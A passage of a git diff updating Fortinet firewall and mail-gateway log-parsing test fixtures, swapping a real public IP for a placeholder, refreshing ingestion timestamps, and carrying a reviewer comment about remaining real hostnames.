eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf=\"port10\" srcintfrole=\"lan\" dstintf=\"port9\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" direction=\"outgoing\" policyid=1 sessionid=4414 applist=\"block-social.media\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" action=\"pass\" hostname=\"www.dailymotion.com\" incidentserialno=1962906680 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"*.dailymotion.com\" scertissuer=\"DigiCert SHA2 High Assurance Server CA\"", "code": "1059028704", "kind": "event", "start": "2019-05-16T01:03:35.000Z", 
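Review bot: The app-ctrl event in the `@@ -2927` hunk anonymises `dstip` to `67.43.156.14` but leaves `hostname=\"www.dailymotion.com\"` and `scertcname=\"*.dailymotion.com\"` in `event.original`, and the `as.organization.name` removed in the `-2833` hunk above named the same operator. That is outside this PR's stated scope of IP addresses, but if the intent is to stop fixtures pointing at real third-party infrastructure, the hostname and certificate fields identify it just as directly; a reserved name such as `www.example.com` in the input log would avoid that when this fixture is next regenerated.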
@@ -2947,23 +2544,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 500, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "description": "Progress IPsec phase 1" @@ -2993,7 +2575,7 @@ "related": { "ip": [ "10.10.10.10", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -3014,8 +2596,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133798400Z", - "original": "\u003c190\u003edate=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type=\"event\" subtype=vpn level=notice vd=root logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf=\"port1\" cookies=\"125cbf9ee8349965/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"P1_Test\" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK", + "ingested": "2021-12-09T13:37:22.357987500Z", + "original": "\u003c190\u003edate=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type=\"event\" subtype=vpn level=notice vd=root logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf=\"port1\" cookies=\"125cbf9ee8349965/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"P1_Test\" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK", "code": "0101037127", "kind": "event", "type": [ 
@@ -3057,7 +2639,7 @@
 "message": "Updated tag FCTEMS0000011111_AV-Running.",
 "event": {
 "start": "2021-05-07T08:31:14.880+01:00",
- "ingested": "2021-06-29T09:32:55.133805700Z",
+ "ingested": "2021-12-09T13:37:22.357993200Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880370858 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3097,7 +2679,7 @@
 "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.",
 "event": {
 "start": "2021-05-07T08:31:14.880+01:00",
- "ingested": "2021-06-29T09:32:55.133813Z",
+ "ingested": "2021-12-09T13:37:22.357998900Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880455433 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3137,7 +2719,7 @@
 "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.",
 "event": {
 "start": "2021-05-07T08:31:14.880+01:00",
- "ingested": "2021-06-29T09:32:55.133820200Z",
+ "ingested": "2021-12-09T13:37:22.358004900Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880744919 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3177,7 +2759,7 @@
 "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.",
 "event": {
 "start": "2021-05-07T08:31:14.880+01:00",
- "ingested": "2021-06-29T09:32:55.133827500Z",
+ "ingested": "2021-12-09T13:37:22.358010500Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880784143 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3217,7 +2799,7 @@
 "message": "Updated tag FCTEMS0000011111_AV-Running.",
 "event": {
 "start": "2021-05-07T08:31:14.900+01:00",
- "ingested": "2021-06-29T09:32:55.133834800Z",
+ "ingested": "2021-12-09T13:37:22.358016200Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900027938 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3257,7 +2839,7 @@
 "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.",
 "event": {
 "start": "2021-05-07T08:31:14.900+01:00",
- "ingested": "2021-06-29T09:32:55.133842200Z",
+ "ingested": "2021-12-09T13:37:22.358023800Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900167367 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3297,7 +2879,7 @@
 "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.",
 "event": {
 "start": "2021-05-07T08:31:14.900+01:00",
- "ingested": "2021-06-29T09:32:55.133849300Z",
+ "ingested": "2021-12-09T13:37:22.358027300Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900749585 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"",
 "code": "0112053203",
 "timezone": "+0100",
@@ -3337,7 +2919,7 @@
 "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.",
 "event": {
 "start": "2021-05-07T08:31:14.900+01:00",
- "ingested": "2021-06-29T09:32:55.133856500Z",
+ "ingested": "2021-12-09T13:37:22.358032Z",
 "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900961834 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"",
 "code": "0112053203",
 "timezone": "+0100",
diff --git a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json
index 5d63c4cf3e0..db1073d9162 100644
--- a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json
+++ b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json
@@ -6,7 +6,7 @@
 },
 "message": "date=2016-1-29 time=06:09:59 device_id=pexe log_id=nes log_part=eab type=event subtype=update pri=high msg=\"boNemoe\"",
 "event": {
- "ingested": "2021-06-29T09:33:00.526473300Z"
+ "ingested": "2021-12-09T13:37:30.095994800Z"
 },
 "tags": [
 "preserve_original_event"
@@ -18,7 +18,7 @@
 },
 "message": "date=2016-2-12 time=13:12:33 device_id=ehend log_id=ritquiin log_part=umqui type=virus subtype=infected pri=very-high from=\"mest\" to=enderitq client_name=\"sperna884.internal.domain\" client_ip=\"10.165.201.71\" session_id=\"pisciv\" msg=\"uii\"",
 "event": {
- "ingested": "2021-06-29T09:33:00.526485200Z"
+ "ingested": "2021-12-09T13:37:30.096004200Z"
 },
 "tags": [
 "preserve_original_event"
@@ -30,7 +30,7 @@
 },
 "message": "date=2016-2-26 time=20:15:08 device_id=doeiu log_id=nia log_part=olupt type=event subtype=config pri=low user=quipexe ui=alo(10.212.18.145) module=umdo submodule=itessequ msg=vol",
 "event": {
- "ingested": "2021-06-29T09:33:00.526493Z"
+ "ingested": "2021-12-09T13:37:30.096010600Z"
 },
 "tags": [
 "preserve_original_event"
@@ -42,7 +42,7 @@
 },
 "message": "date=2016-3-12 time=03:17:42 device_id=uipexea log_id=tatio log_part=minim type=event subtype=pop3 pri=high user=ceroinBC ui=ratvolup action=deny status=iatu msg=\"ionofde\"",
 "event": {
- "ingested": "2021-06-29T09:33:00.526500400Z"
+ "ingested": "2021-12-09T13:37:30.096016700Z"
 },
 "tags": [
 "preserve_original_event"
@@ -54,7 +54,7 @@
 },
 "message": "date=2016-3-26 time=10:20:16 device_id=itati log_id=mfu log_part=uid type=event subtype=pop3 pri=very-high user=obeataev ui=lor action=block status=autfu msg=\"natura\"",
 "event": {
- "ingested": "2021-06-29T09:33:00.526507800Z"
+ "ingested": "2021-12-09T13:37:30.096022700Z"
 },
 "tags": [
 "preserve_original_event"
@@ -66,7 +66,7 @@
 },
 "message": "date=2016-4-9 time=17:22:51 device_id=llamcorp log_id=ari log_part=eataevit type=event subtype=system pri=high user=iam ui=mqua action=allow status=olab msg=mquisnos",
 "event": {
- "ingested": "2021-06-29T09:33:00.526515100Z"
+ "ingested": "2021-12-09T13:37:30.096028800Z"
 },
 "tags": [
 "preserve_original_event"
@@ -78,7 +78,7 @@
 },
 "message": "date=2016-4-24 time=00:25:25 device_id=enimad log_id=incididu log_part=eci type=virus pri=very-high from=tenbyCic to=boree src=10.98.69.43 session_id=\"iinea\" msg=ipit",
 "event": {
- "ingested": "2021-06-29T09:33:00.526522700Z"
+ "ingested": "2021-12-09T13:37:30.096034900Z"
 },
 "tags": [
 "preserve_original_event"
@@ -90,7 +90,7 @@ }, "message": "date=2016-5-8 time=07:27:59 device_id=taliqu log_id=temUten log_part=ccusan type=virus subtype=infected pri=low from=\"Ciceroi\" to=\"aveniam\" client_name=\"uradi7307.internal.corp\" client_ip=\"10.118.96.139\" session_id=\"sitas\" msg=ehenderi", "event": { - "ingested": "2021-06-29T09:33:00.526526800Z" + "ingested": "2021-12-09T13:37:30.096041Z" }, "tags": [ "preserve_original_event" @@ -102,7 +102,7 @@ }, "message": "date=2016-5-22 time=14:30:33 device_id=smo log_id=litessec log_part=emporinc type=event subtype=pop3 pri=very-high user=ipsumq ui=atcu action=allow status=tessec msg=\"remipsum\"", "event": { - "ingested": "2021-06-29T09:33:00.526532200Z" + "ingested": "2021-12-09T13:37:30.096047Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "date=2016-6-5 time=21:33:08 device_id=ntutl log_id=caecatc log_part=onsequat type=event subtype=update pri=low msg=\"edquiano\"", "event": { - "ingested": "2021-06-29T09:33:00.526537600Z" + "ingested": "2021-12-09T13:37:30.096053Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "date=2016-6-20 time=04:35:42 device_id=idestla log_id=Nemoeni log_part=uradi type=statistics pri=very-high session_id=\"lup\" from=\"remeumf\" mailer=antiumto client_name=\"10.241.165.37\" MSISDN=aUteni resolved=ittenbyC to=\"aperi\" direction=\"inbound\" message_length=ita virus=\"ipi\" disposition=rsitamet classifier=\"lupt\" subject=\"xea\"", "event": { - "ingested": "2021-06-29T09:33:00.526543800Z" + "ingested": "2021-12-09T13:37:30.096059100Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "date=2016-7-4 time=11:38:16 device_id=amvolup log_id=sequi log_part=rehend type=event subtype=webmail pri=high user=eme ui=numqu(10.232.149.140) action=allow status=lum msg=utali", "event": { - "ingested": "2021-06-29T09:33:00.526551600Z" + "ingested": "2021-12-09T13:37:30.096067700Z" }, "tags": [ "preserve_original_event" 
@@ -150,7 +150,7 @@ }, "message": "date=2016-7-18 time=18:40:50 device_id=estiae log_id=sci log_part=oei type=virus_file-signature pri=low snostrud to=nama src=\"10.24.67.250\" session_id=\"dolor\" msg=\"nnum\"", "event": { - "ingested": "2021-06-29T09:33:00.526558300Z" + "ingested": "2021-12-09T13:37:30.096074Z" }, "tags": [ "preserve_original_event" @@ -162,7 +162,7 @@ }, "message": "date=2016-8-2 time=01:43:25 device_id=oluptas log_id=tNequepo log_part=lup type=event subtype=update pri=medium msg=equat", "event": { - "ingested": "2021-06-29T09:33:00.526562600Z" + "ingested": "2021-12-09T13:37:30.096080Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "date=2016-8-16 time=08:45:59 device_id=abi log_id=sectetur log_part=uioffi type=event subtype=update pri=high msg=veniamq", "event": { - "ingested": "2021-06-29T09:33:00.526566600Z" + "ingested": "2021-12-09T13:37:30.096086100Z" }, "tags": [ "preserve_original_event" @@ -186,7 +186,7 @@ }, "message": "date=2016-8-30 time=15:48:33 device_id=orem log_id=beata log_part=hitecto type=statistics pri=very-high session_id=\"texp\" client_name=\"[10.179.124.125]\"dst_ip=\"10.177.36.38\" from=\"sequine\" to=\"ectio\" polid=\"dutper\" domain=\"lamcolab3252.www.invalid\" subject=\"gel\" mailer=\"lorsitam\" resolved=\"mpo\" direction=\"inbound\" virus=\"ris\" disposition=\"uamqu\" classifier=\"lor\" message_length=oide", "event": { - "ingested": "2021-06-29T09:33:00.526570100Z" + "ingested": "2021-12-09T13:37:30.096092300Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "date=2016-9-13 time=22:51:07 device_id=didunt log_id=uptatema log_part=intocc type=virus subtype=file-signature pri=very-high from=\"orema\" to=invento src=[10.164.39.248] session_id=\"nofdeFin\" msg=sequam", "event": { - "ingested": "2021-06-29T09:33:00.526575500Z" + "ingested": "2021-12-09T13:37:30.096096900Z" }, "tags": [ "preserve_original_event" 
@@ -210,7 +210,7 @@ }, "message": "date=2016-9-28 time=05:53:42 device_id=tvolu log_id=ecte log_part=tinvolu type=virus_file-signature pri=high from=\"ntiumdo\" to=\"autfu\" src=gnaaliq [10.52.135.156] session_id=\"litse\" msg=\"icabo\"", "event": { - "ingested": "2021-06-29T09:33:00.526581800Z" + "ingested": "2021-12-09T13:37:30.096101900Z" }, "tags": [ "preserve_original_event" @@ -222,7 +222,7 @@ }, "message": "date=2016-10-12 time=12:56:16 device_id=stru log_id=tectobe log_part=Nequepo type=event subtype=config pri=very-high user=pora ui=boree module=evolup submodule=ionofdeF msg=\"evelit\"", "event": { - "ingested": "2021-06-29T09:33:00.526586700Z" + "ingested": "2021-12-09T13:37:30.096107700Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "date=2016-10-26 time=19:58:50 device_id=uatD log_id=ariatu log_part=edquiac type=event subtype=smtp pri=high user=atno ui=tani action=allow status=ntocca session_id=ostru log_part=ntoccae msg=autf", "event": { - "ingested": "2021-06-29T09:33:00.526590800Z" + "ingested": "2021-12-09T13:37:30.096113Z" }, "tags": [ "preserve_original_event" @@ -246,7 +246,7 @@ }, "message": "date=2016-11-10 time=03:01:24 device_id=tenimad log_id=minimav log_part=udexerci type=spam pri=very-high session_id=\"itam\" client_name=\"str976.internal.localhost [10.166.225.26]\" from=tanimid to=umdo subject=\"natuse\" msg=\"gnamal\"", "event": { - "ingested": "2021-06-29T09:33:00.526596600Z" + "ingested": "2021-12-09T13:37:30.096117400Z" }, "tags": [ "preserve_original_event" @@ -258,7 +258,7 @@ }, "message": "date=2016-11-24 time=10:03:59 device_id=intoc log_id=rQuisau log_part=itess type=virus subtype=infected pri=high from=evit to=\"runtm\" client_name=\"molli4306.www5.home\" client_ip=\"10.218.243.47\" session_id=\"borios\" msg=rsitvolu", "event": { - "ingested": "2021-06-29T09:33:00.526605100Z" + "ingested": "2021-12-09T13:37:30.096122400Z" }, "tags": [ "preserve_original_event" 
@@ -270,7 +270,7 @@ }, "message": "date=2016-12-8 time=17:06:33 device_id=quamqua log_id=eacommod log_part=ctetura type=event subtype=imap pri=high user=tpersp ui=stla action=allow status=sequamni msg=uradi", "event": { - "ingested": "2021-06-29T09:33:00.526611200Z" + "ingested": "2021-12-09T13:37:30.096128600Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "date=2016-12-23 time=00:09:07 device_id=dolore log_id=onsecte log_part=nBCSedut type=virus subtype=file-signature pri=high from=\"modocons\" to=gitsed src=\"10.16.177.212\" session_id=\"emp\" msg=\"Attachment file (pisciv) has sha1 hash value: lumdolor\"", "event": { - "ingested": "2021-06-29T09:33:00.526617200Z" + "ingested": "2021-12-09T13:37:30.096133200Z" }, "tags": [ "preserve_original_event" @@ -294,7 +294,7 @@ }, "message": "date=2017-1-6 time=07:11:41 device_id=uaUten log_id=nby log_part=mve type=event subtype=config pri=low user=isau ui=rautodi(10.96.97.81) module=pis submodule=nsequat msg=doloreme", "event": { - "ingested": "2021-06-29T09:33:00.526622100Z" + "ingested": "2021-12-09T13:37:30.096137900Z" }, "tags": [ "preserve_original_event" @@ -306,7 +306,7 @@ }, "message": "date=2017-1-20 time=14:14:16 device_id=aec log_id=fdeF log_part=iquidexe type=spam pri=low session_id=\"niamq\" client_name= \"lapariat7287.internal.host\" client_ip=\"10.140.7.83\" dst_ip=\"10.68.246.187\" from=\"icabo\" to=\"gna\" subject=\"con\" msg=\"preh\"", "event": { - "ingested": "2021-06-29T09:33:00.526627500Z" + "ingested": "2021-12-09T13:37:30.096141700Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "date=2017-2-3 time=21:16:50 device_id=amcor log_id=ica log_part=lillum type=event subtype=admin pri=very-high user=dicta ui=taedicta action=accept status=poriss reason=failure msg=equaturv", "event": { - "ingested": "2021-06-29T09:33:00.526635300Z" + "ingested": "2021-12-09T13:37:30.096146500Z" }, "tags": [ "preserve_original_event" 
@@ -330,7 +330,7 @@ }, "message": "date=2017-2-18 time=04:19:24 device_id=tpersp log_id=llamc log_part=nte type=event subtype=pop3 pri=very-high user=utali ui=porinc(10.48.204.44) action=accept status=dat msg=aincidu", "event": { - "ingested": "2021-06-29T09:33:00.526642900Z" + "ingested": "2021-12-09T13:37:30.096152900Z" }, "tags": [ "preserve_original_event" @@ -342,7 +342,7 @@ }, "message": "date=2017-3-4 time=11:21:59 device_id=dipisci log_id=spernatu log_part=admi type=event subtype=pop3 pri=very-high user=quunt ui=olori action=allow status=autodit msg=elit", "event": { - "ingested": "2021-06-29T09:33:00.526650100Z" + "ingested": "2021-12-09T13:37:30.096159100Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "date=2017-3-18 time=18:24:33 device_id=nte log_id=ulpa log_part=sitam type=virus subtype=file-signature pri=low enderit to=sequa src=\"[10.111.233.194]\" session_id=eirure msg=deserun", "event": { - "ingested": "2021-06-29T09:33:00.526657500Z" + "ingested": "2021-12-09T13:37:30.096165200Z" }, "tags": [ "preserve_original_event" @@ -366,7 +366,7 @@ }, "message": "date=2017-4-2 time=01:27:07 device_id=ptateve log_id=enderi log_part=ptatem type=event subtype=smtp pri=very-high user=fugi ui=labo action=block status=ullamcor session_id=itationu msg=proident", "event": { - "ingested": "2021-06-29T09:33:00.526664900Z" + "ingested": "2021-12-09T13:37:30.096171200Z" }, "tags": [ "preserve_original_event" 
@@ -378,7 +378,7 @@ }, "message": "date=2017-4-16 time=08:29:41 device_id=atione log_id=lores log_part=ritati type=statistics pri=very-high session_id=uii client_name=estl5804.internal.local client_ip=10.73.207.70 dst_ip=10.179.210.218 from=taut hfrom=tanimi to=rumSecti polid=iuntNe domain=atise3421.www5.localdomain mailer=oluptas resolved=emvele src_type=isnost direction=inbound virus=Sedut disposition=yCiceroi classifier=quunt message_length=acommod subject=sitvol", "event": { - "ingested": "2021-06-29T09:33:00.526668900Z" + "ingested": "2021-12-09T13:37:30.096177200Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "date=2017-4-30 time=15:32:16 device_id=liquide log_id=odt log_part=Sedutpe type=event subtype=admin pri=medium user=rroq ui=rcit(10.43.62.246) action=accept status=estl reason=success msg=citatio", "event": { - "ingested": "2021-06-29T09:33:00.526697400Z" + "ingested": "2021-12-09T13:37:30.096183300Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "date=2017-5-14 time=22:34:50 device_id=taedict log_id=edquian log_part=loremeu type=event subtype=admin pri=very-high user=volupta ui=dmi action=allow status=aaliq reason=unknown msg=lupta", "event": { - "ingested": "2021-06-29T09:33:00.526703400Z" + "ingested": "2021-12-09T13:37:30.096189400Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "date=2017-5-29 time=05:37:24 device_id=occ log_id=oloreseo log_part=iruredol type=virus subtype=file-signature pri=very-high derit to=orese src=\"[10.28.105.124]\" session_id=\"strude\" msg=eritin", "event": { - "ingested": "2021-06-29T09:33:00.526710Z" + "ingested": "2021-12-09T13:37:30.096195600Z" }, "tags": [ "preserve_original_event" 
@@ -426,7 +426,7 @@ }, "message": "date=2017-6-12 time=12:39:58 device_id=temUten log_id=dutper log_part=sitamet type=event subtype=admin pri=very-high user=illumqui ui=saq action=block status=ritqu reason=unknown msg=\"idolor\"", "event": { - "ingested": "2021-06-29T09:33:00.526718Z" + "ingested": "2021-12-09T13:37:30.096201700Z" }, "tags": [ "preserve_original_event" @@ -438,7 +438,7 @@ }, "message": "date=2017-6-26 time=19:42:33 device_id=quide log_id=quaU log_part=undeomni type=virus_file-signature pri=medium acomm to=iutali src=\"[10.219.13.150]\" session_id=Finibus msg=radi", "event": { - "ingested": "2021-06-29T09:33:00.526741800Z" + "ingested": "2021-12-09T13:37:30.096207700Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "date=2017-7-11 time=02:45:07 device_id=inrepr log_id=mol log_part=umdolors type=event subtype=pop3 pri=medium user=imad ui=oriosam(10.163.114.215) action=deny status=sitametc msg=onsequa", "event": { - "ingested": "2021-06-29T09:33:00.526746100Z" + "ingested": "2021-12-09T13:37:30.096213900Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "date=2017-7-25 time=09:47:41 device_id=riosa log_id=tNe log_part=pisc type=event subtype=webmail pri=very-high user=caecat ui=rautod(10.124.32.120) action=accept status=atcupi msg=atem", "event": { - "ingested": "2021-06-29T09:33:00.526750Z" + "ingested": "2021-12-09T13:37:30.096220100Z" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "message": "date=2017-8-8 time=16:50:15 device_id=undeom log_id=emullamc log_part=tec type=event subtype=imap pri=medium user=eetdo ui=tlab action=cancel status=liq msg=seddoeiu", "event": { - "ingested": "2021-06-29T09:33:00.526753500Z" + "ingested": "2021-12-09T13:37:30.096226200Z" }, "tags": [ "preserve_original_event" 
@@ -486,7 +486,7 @@ }, "message": "date=2017-8-22 time=23:52:50 device_id=edictasu log_id=mdolors log_part=oremi type=event subtype=imap pri=medium user=atis ui=atDuis action=accept status=nisiut msg=\"rumwri\"", "event": { - "ingested": "2021-06-29T09:33:00.526758700Z" + "ingested": "2021-12-09T13:37:30.096232300Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "date=2017-9-6 time=06:55:24 device_id=lumqu log_id=onulamco log_part=ons type=event subtype=pop3 pri=low user=uptat ui=unt action=accept status=uido msg=tla", "event": { - "ingested": "2021-06-29T09:33:00.526764Z" + "ingested": "2021-12-09T13:37:30.096238400Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "date=2017-9-20 time=13:57:58 device_id=uamqu log_id=olori log_part=ido type=spam pri=low session_id=\"sunt\" from=\"autfugit\" to=\"emUte\" msg=iusmodi", "event": { - "ingested": "2021-06-29T09:33:00.526770600Z" + "ingested": "2021-12-09T13:37:30.096242900Z" }, "tags": [ "preserve_original_event" @@ -522,7 +522,7 @@ }, "message": "date=2017-10-4 time=21:00:32 device_id=umS log_id=iciadese log_part=riatur type=event subtype=webmail pri=very-high user=xeacommo ui=Cicero(10.247.53.179) action=cancel status=ditau msg=atemaccu", "event": { - "ingested": "2021-06-29T09:33:00.526779300Z" + "ingested": "2021-12-09T13:37:30.096247900Z" }, "tags": [ "preserve_original_event" @@ -534,7 +534,7 @@ }, "message": "date=2017-10-19 time=04:03:07 device_id=urau log_id=etur log_part=rsitvol type=event subtype=config pri=low user=laborum ui=ostr(10.70.91.185) module=lumdo submodule=acom msg=\"eFini\"", "event": { - "ingested": "2021-06-29T09:33:00.526787Z" + "ingested": "2021-12-09T13:37:30.096253500Z" }, "tags": [ "preserve_original_event" 
@@ -546,7 +546,7 @@ }, "message": "date=2017-11-2 time=11:05:41 device_id=upta log_id=itessequ log_part=iusmodit type=event subtype=update pri=very-high msg=exerci", "event": { - "ingested": "2021-06-29T09:33:00.526794200Z" + "ingested": "2021-12-09T13:37:30.096258800Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "date=2017-11-16 time=18:08:15 device_id=mmodoco log_id=amni log_part=atnul type=event subtype=webmail pri=medium user=iquidexe ui=illumq(10.215.65.52) action=accept status=tasnul msg=\"tuserr\"", "event": { - "ingested": "2021-06-29T09:33:00.526801600Z" + "ingested": "2021-12-09T13:37:30.096263Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "date=2017-12-1 time=01:10:49 device_id=porinc log_id=riame log_part=riat type=event subtype=admin pri=medium user=rumSec ui=orp action=deny status=udan reason=unknown msg=\"essequam\"", "event": { - "ingested": "2021-06-29T09:33:00.526809Z" + "ingested": "2021-12-09T13:37:30.096268100Z" }, "tags": [ "preserve_original_event" @@ -582,7 +582,7 @@ }, "message": "date=2017-12-15 time=08:13:24 device_id=itse log_id=ilm log_part=mvel type=virus subtype=infected pri=high from=seos to=exercita client_name=\"edolori3822.api.home\" client_ip=\"10.63.177.46\" session_id=\"oluptate\" msg=lit", "event": { - "ingested": "2021-06-29T09:33:00.526832700Z" + "ingested": "2021-12-09T13:37:30.096274400Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "date=2017-12-29 time=15:15:58 device_id=iciade log_id=uis log_part=amc type=event subtype=webmail pri=medium user=Ute ui=ptassita action=allow status=runtm msg=\"eturadip\"", "event": { - "ingested": "2021-06-29T09:33:00.526840Z" + "ingested": "2021-12-09T13:37:30.096279Z" }, "tags": [ "preserve_original_event" 
@@ -606,7 +606,7 @@ }, "message": "date=2018-1-12 time=22:18:32 device_id=colabori log_id=imidestl log_part=piscing type=virus subtype=file-signature pri=high from=\"isn\" to=smod src=\"idunt [10.29.120.226]\" session_id=\"atev\" msg=\"ectio\"", "event": { - "ingested": "2021-06-29T09:33:00.526847400Z" + "ingested": "2021-12-09T13:37:30.096283500Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "date=2018-1-27 time=05:21:06 device_id=atcupid log_id=onse log_part=psa type=virus_file-signature pri=high destla to=\"fugitse\" src=[10.12.86.130] session_id=dese msg=\"Attachment file (duntutla) has sha1 hash value: lamco\"", "event": { - "ingested": "2021-06-29T09:33:00.526851500Z" + "ingested": "2021-12-09T13:37:30.096287300Z" }, "tags": [ "preserve_original_event" @@ -630,7 +630,7 @@ }, "message": "date=2018-2-10 time=12:23:41 device_id=gna log_id=ici log_part=quamnih type=event subtype=pop3 